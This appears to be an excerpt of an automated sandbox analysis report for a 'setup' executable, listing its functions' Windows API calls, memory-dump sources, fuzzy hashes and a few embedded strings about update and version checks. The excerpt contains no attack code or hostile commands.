                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 639e220577c0504a99e1b569ca82776cd9d9796366904e8088f1be205eb672fc
                                                                                                                          • Instruction ID: 8656cf4a7d3da7858b190a46bd1d502be6765de4b6f3f4b5cb590ffda7dd55de
                                                                                                                          • Opcode Fuzzy Hash: 639e220577c0504a99e1b569ca82776cd9d9796366904e8088f1be205eb672fc
                                                                                                                          • Instruction Fuzzy Hash: EB11E731604205BFEB206F659C48F6F3B58FB817A0F218139FA29971A0DB708D01E6A1
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 00C32536
                                                                                                                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 00C32560
                                                                                                                          • GetCapture.USER32 ref: 00C32576
                                                                                                                          • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 00C32585
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Capture
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1665607226-0
                                                                                                                          • Opcode ID: a46facde81d4e0c0be05be8cfecad2745bd5f81a1a35a3b547f66636b7d8e3e5
                                                                                                                          • Instruction ID: 26178230635d221750d52f834e980731fb1689759d36625028a2ff9e2798e735
                                                                                                                          • Opcode Fuzzy Hash: a46facde81d4e0c0be05be8cfecad2745bd5f81a1a35a3b547f66636b7d8e3e5
                                                                                                                          • Instruction Fuzzy Hash: 39119871350219BFEE211B60DC9DFBE7B6EFB48794F050025F605561E6CBA19D10AA60
                                                                                                                          APIs
                                                                                                                          • BeginDeferWindowPos.USER32(00000000), ref: 00C3FD93
                                                                                                                          • IsWindow.USER32(?), ref: 00C3FDAE
                                                                                                                          • DeferWindowPos.USER32(00000000,?,00000000,?,?,?,?,00000000), ref: 00C3FDF7
                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 00C3FE02
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Defer$Begin
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2880567340-0
                                                                                                                          • Opcode ID: d7f2aaefa55bab12d741f701fa5200302c17c71369d712b022b3d1b97775c826
                                                                                                                          • Instruction ID: 453545b6ea76c199479f0ab57d4daa805e9a6da539b9f95524306dabb08111c3
                                                                                                                          • Opcode Fuzzy Hash: d7f2aaefa55bab12d741f701fa5200302c17c71369d712b022b3d1b97775c826
                                                                                                                          • Instruction Fuzzy Hash: 7B113A71E0020AAFDB11DFA9DD48BAEBBB9FF08700F144529A501E3261D730AA51DBA0
                                                                                                                          APIs
                                                                                                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,00000000), ref: 00C3B116
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C3B11F
                                                                                                                          • swprintf.LIBCMT ref: 00C3B13C
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00C3B14D
                                                                                                                            • Part of subcall function 00C3AF66: RegCloseKey.ADVAPI32(00000000,?,?,?,?,00C3AD94,?,00000000), ref: 00C3AFAB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$PrivateProfileStringValueWriteswprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 581541481-0
                                                                                                                          • Opcode ID: ebfdbb094721df4937e897446e23604637de8b068f7d10c01c3fd1aa987677a4
                                                                                                                          • Instruction ID: e18f7b600164c2eae8d771ea087f58a6e6ad689c6903163efaa6d113399dc76a
                                                                                                                          • Opcode Fuzzy Hash: ebfdbb094721df4937e897446e23604637de8b068f7d10c01c3fd1aa987677a4
                                                                                                                          • Instruction Fuzzy Hash: E4016172500209ABDB149F68DD8AFAE77BDEF48B14F10451AF601E7190DB74EE049760
                                                                                                                          APIs
                                                                                                                          • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00C1965A
                                                                                                                          • VerSetConditionMask.KERNEL32(00000000), ref: 00C1965E
                                                                                                                          • VerSetConditionMask.KERNEL32(00000000), ref: 00C19662
                                                                                                                          • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00C19685
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2793162063-0
                                                                                                                          • Opcode ID: 3498bb21b144612307cd22a9d979c96b7bae92649f8646ed6b19e7bf83ef2a40
                                                                                                                          • Instruction ID: f93042d4f41150facfcc22dccb7d486285da589df9f69fcde9bcdbadf2e1129c
                                                                                                                          • Opcode Fuzzy Hash: 3498bb21b144612307cd22a9d979c96b7bae92649f8646ed6b19e7bf83ef2a40
                                                                                                                          • Instruction Fuzzy Hash: 22111270E402187AEB319F659C4AFEFBBBCEF84B10F00419AA508A6181D7B45B45CE95
                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNEL32(00000000,?,00C7145B,00000000,00000004,00000000), ref: 00C71686
                                                                                                                          • GetLastError.KERNEL32 ref: 00C71692
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C71699
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2744730728-0
APIs
• EnableMenuItem.USER32(?,?,00000403), ref: 00C377BA
• GetFocus.USER32 ref: 00C377D4
• GetParent.USER32(?), ref: 00C377DF
• SendMessageW.USER32(?,00000028,00000000,00000000), ref: 00C377F4
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: EnableFocusItemMenuMessageParentSend
• String ID:
• API String ID: 2297321873-0
APIs
• WindowFromPoint.USER32(?,?), ref: 00C3C81A
• GetParent.USER32(00000000), ref: 00C3C828
• ScreenToClient.USER32(00000000,?), ref: 00C3C849
• IsWindowEnabled.USER32(00000000), ref: 00C3C862
  • Part of subcall function 00C3D666: GetWindowLongW.USER32(?,000000F0), ref: 00C3D681
  • Part of subcall function 00C3D666: GetClassNameW.USER32(?,?,0000000A), ref: 00C3D696
  • Part of subcall function 00C3D666: CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 00C3D6AD
Similarity
• API ID: Window$ClassClientCompareEnabledFromLongNameParentPointScreenString
• String ID:
• API String ID: 3223446165-0
APIs
• GetDlgItem.USER32(?,?), ref: 00C30654
• GetTopWindow.USER32(00000000), ref: 00C30661
  • Part of subcall function 00C3064A: GetWindow.USER32(00000000,00000002), ref: 00C306B0
• GetTopWindow.USER32(?), ref: 00C30695
Similarity
• API ID: Window$Item
• String ID:
• API String ID: 369458955-0
APIs
• SendMessageW.USER32(?,00000406,00000000,?), ref: 00C1E3D9
• SendMessageW.USER32(?,00000402,?,00000000), ref: 00C1E3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 00C1E3FD
• UpdateWindow.USER32(?), ref: 00C1E405
Similarity
• API ID: MessageSend$InvalidateRectUpdateWindow
• String ID:
• API String ID: 464723990-0
APIs
• GetFullPathNameW.KERNEL32(?,?,?,00000000,00C79A9C,00000000,?,00C870E2,00C79A9C,00C79A9C,00000104,?,?,00000030,?,00000001), ref: 00C798ED
• GetLastError.KERNEL32(?,00C870E2,00C79A9C,00C79A9C,00000104,?,?,00000030,?,00000001,00000000,00000000,?,00C79A9C,?,00000030), ref: 00C798F7
• __dosmaperr.LIBCMT ref: 00C798FE
• GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,00C870E2,00C79A9C,00C79A9C,00000104,?,?,00000030,?,00000001,00000000), ref: 00C79928
Similarity
• API ID: FullNamePath$ErrorLast__dosmaperr
• String ID:
• API String ID: 1391015842-0
APIs
• GetFullPathNameW.KERNEL32(?,FF531275,F6855959,00000000,?,00000000,?,00C7984A,?,?,?,00C796D5,?,?,00C6A29E,?), ref: 00C799B9
• GetLastError.KERNEL32(?,00C7984A,?,?,?,00C796D5,?,?,00C6A29E,?,00000000), ref: 00C799C3
• __dosmaperr.LIBCMT ref: 00C799CA
• GetFullPathNameW.KERNEL32(?,FF531275,F6855959,00000000,FF531276,?,00C7984A,?,?,?,00C796D5,?,?,00C6A29E,?,00000000), ref: 00C799F4
Similarity
• API ID: FullNamePath$ErrorLast__dosmaperr
• String ID:
• API String ID: 1391015842-0
APIs
• GetFullPathNameW.KERNEL32(?,?,?,00000000,00C79A9C,00000000,?,00C87154,00C79A9C,00000104,?,?,00000030,?,00000001,00000000), ref: 00C79953
• GetLastError.KERNEL32(?,00C87154,00C79A9C,00000104,?,?,00000030,?,00000001,00000000,00000000,?,00C79A9C,?,00000030,00000104), ref: 00C7995D
• __dosmaperr.LIBCMT ref: 00C79964
• GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,00C87154,00C79A9C,00000104,?,?,00000030,?,00000001,00000000,00000000), ref: 00C7998E
Similarity
• API ID: FullNamePath$ErrorLast__dosmaperr
• String ID:
• API String ID: 1391015842-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Parent$Focus
• String ID:
• API String ID: 384096180-0
APIs
  • Part of subcall function 00C195FB: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00C1965A
  • Part of subcall function 00C195FB: VerSetConditionMask.KERNEL32(00000000), ref: 00C1965E
  • Part of subcall function 00C195FB: VerSetConditionMask.KERNEL32(00000000), ref: 00C19662
  • Part of subcall function 00C195FB: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00C19685
• GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00C196BD
• OpenProcessToken.ADVAPI32(00000000), ref: 00C196C4
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: ConditionMask$Process$CurrentInfoOpenTokenVerifyVersion
• String ID:
• API String ID: 4086206417-0
APIs
• CreateFileW.KERNEL32(?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00C090A9
• GetFileSizeEx.KERNEL32(00000000,?,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00C090BB
• CloseHandle.KERNEL32(00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00C090C6
• CloseHandle.KERNEL32(00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00C090D4
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: CloseFileHandle$CreateSize
• String ID:
• API String ID: 4148174661-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Window
• String ID:
• API String ID: 2353593579-0
APIs
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C90668,00000000,00000001,00000000,?,?,00C8B11F,?,00000000,00000000), ref: 00C91804
• GetLastError.KERNEL32(?,00C90668,00000000,00000001,00000000,?,?,00C8B11F,?,00000000,00000000,?,?,?,00C8B6F9,00000000), ref: 00C91810
  • Part of subcall function 00C917D6: CloseHandle.KERNEL32(FFFFFFFE,00C91820,?,00C90668,00000000,00000001,00000000,?,?,00C8B11F,?,00000000,00000000,?,?), ref: 00C917E6
• ___initconout.LIBCMT ref: 00C91820
  • Part of subcall function 00C91798: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C917C7,00C90655,?,?,00C8B11F,?,00000000,00000000,?), ref: 00C917AB
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00C90668,00000000,00000001,00000000,?,?,00C8B11F,?,00000000,00000000,?), ref: 00C91835
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C47A40
• GetCurrentThreadId.KERNEL32 ref: 00C47A4F
• GetCurrentProcessId.KERNEL32 ref: 00C47A58
• QueryPerformanceCounter.KERNEL32(?), ref: 00C47A65
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
• GetDC.USER32(00000000), ref: 00C24DA7
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00C24DB6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C24DC4
• ReleaseDC.USER32(00000000,00000000), ref: 00C24DD2
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
                                                                                                                          APIs
                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00C860FD
                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: e732248ced5c383f9bc548e0ebd4df41ce731d24b738d418a1fa58d6b0ea828b
• Instruction ID: e5e110d7c8d16bb16095b88dfe903f9cebcb65500c43c2a68311c6274703a42b
• Opcode Fuzzy Hash: e732248ced5c383f9bc548e0ebd4df41ce731d24b738d418a1fa58d6b0ea828b
• Instruction Fuzzy Hash: E1515D61A0410296DB11BB14CD5536F2BA0EB4171CF208D7DE0E6872EBEF358E969B4E
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C1D363
  • Part of subcall function 00C244B5: __EH_prolog3.LIBCMT ref: 00C244BC
  • Part of subcall function 00C244B5: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000104,00000004,00C1D386,?,000000CC,00C1C82F), ref: 00C244E1
  • Part of subcall function 00C1C288: UpdateWindow.USER32(?), ref: 00C1C2FA
Strings
• Unable to check if update program needs updating., xrefs: 00C1D420
• Failed to get version information., xrefs: 00C1D38A
Similarity
• API ID: FileH_prolog3H_prolog3_ModuleNameUpdateWindow
• String ID: Failed to get version information.$Unable to check if update program needs updating.
• API String ID: 1447007336-1761294516
• Opcode ID: 6376c3dd7aed7eb54c00015c389aed4bd00d0ab942a5b0cee40ed98245190889
• Instruction ID: cf27e9680ab467fb318dc87d872832abe8a7b1cad35373da68f4e2519de612fd
• Opcode Fuzzy Hash: 6376c3dd7aed7eb54c00015c389aed4bd00d0ab942a5b0cee40ed98245190889
• Instruction Fuzzy Hash: 67518F71D10268EEEB54DBE9CC419EEB7B9AF18300F40026AF905F3191EB306E45DB61
APIs
Strings
Similarity
• API ID: Global$LockUnlock
• String ID: System
• API String ID: 2502338518-3470857405
• Opcode ID: 9caaa33de7de714a22f0186fcf36e93bfc18e92617ebbc9069f2ec63f6487c4c
• Instruction ID: ad43e323c3839435f15779df9c5e5f34545b69e4b3c618e42b75238bbe2aab0c
• Opcode Fuzzy Hash: 9caaa33de7de714a22f0186fcf36e93bfc18e92617ebbc9069f2ec63f6487c4c
• Instruction Fuzzy Hash: 4841A275A0061AAFDB24DF64C840ABEB7F1FF84350F288129E865A7690E7709F81DB50
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C424A9
• CoCreateGuid.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000028), ref: 00C42504
Strings
• %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X, xrefs: 00C4254E
Similarity
• API ID: CreateGuidH_prolog3_
• String ID: %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X
• API String ID: 2971167768-1017209998
• Opcode ID: 12018c96787ba0b3aed7e7f63e129f8aa479df19fa5da67adeecd87d2ba87769
• Instruction ID: 5db32a48c97a7757034738eb2fbe2137179b3c63c404f604037436d5e27202e0
• Opcode Fuzzy Hash: 12018c96787ba0b3aed7e7f63e129f8aa479df19fa5da67adeecd87d2ba87769
• Instruction Fuzzy Hash: F9418E72A00159AFCF15EBA4C855AFEBBB9AF09310F144059F541B7282CB789E09EB70
APIs
• EncodePointer.KERNEL32(00000000,?), ref: 00C70447
Strings
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 17d4ab5a66c6528e359589eb060b3ebe12df3b7e57a5b26dc32ed88a00055603
• Instruction ID: 6695798abe3138952e1bd2b85aea4caeb5ae611f76cd850a2a13c2244ea0d3ff
• Opcode Fuzzy Hash: 17d4ab5a66c6528e359589eb060b3ebe12df3b7e57a5b26dc32ed88a00055603
• Instruction Fuzzy Hash: 0B415872900209EFCF25DF98DC81AEEBBB5BF08304F248199FA1967251D335AA51DF51
APIs
Strings
Similarity
• API ID: vswprintf
• String ID: element table allocation failed$malloc failed
• API String ID: 225791605-74719141
• Opcode ID: b714717ab85b85b4218495018e19840f9386f1d777ec0e67ba37e66182dc0b90
• Instruction ID: e77519b368be5a63ec8fe577d1afbedb623da027c45592b1f85a5ddbd3824a0e
• Opcode Fuzzy Hash: b714717ab85b85b4218495018e19840f9386f1d777ec0e67ba37e66182dc0b90
• Instruction Fuzzy Hash: D831F075A00A14ABDB319F649C85B6F73ACEF04315F000279FC09A2251EBB1EF4497A1
APIs
Strings
Similarity
• API ID: H_prolog3
• String ID: .lnk$.pif
• API String ID: 431132790-2725715280
• Opcode ID: 522ba4f7fe997f7fa9e752b97ed5e7d2d2ce0fee65f1ab03aa3de4b018083fb2
• Instruction ID: ce2d8ef3e1799537c002b9f3f57810f8c2b388dba07a8c142b7448c2183090be
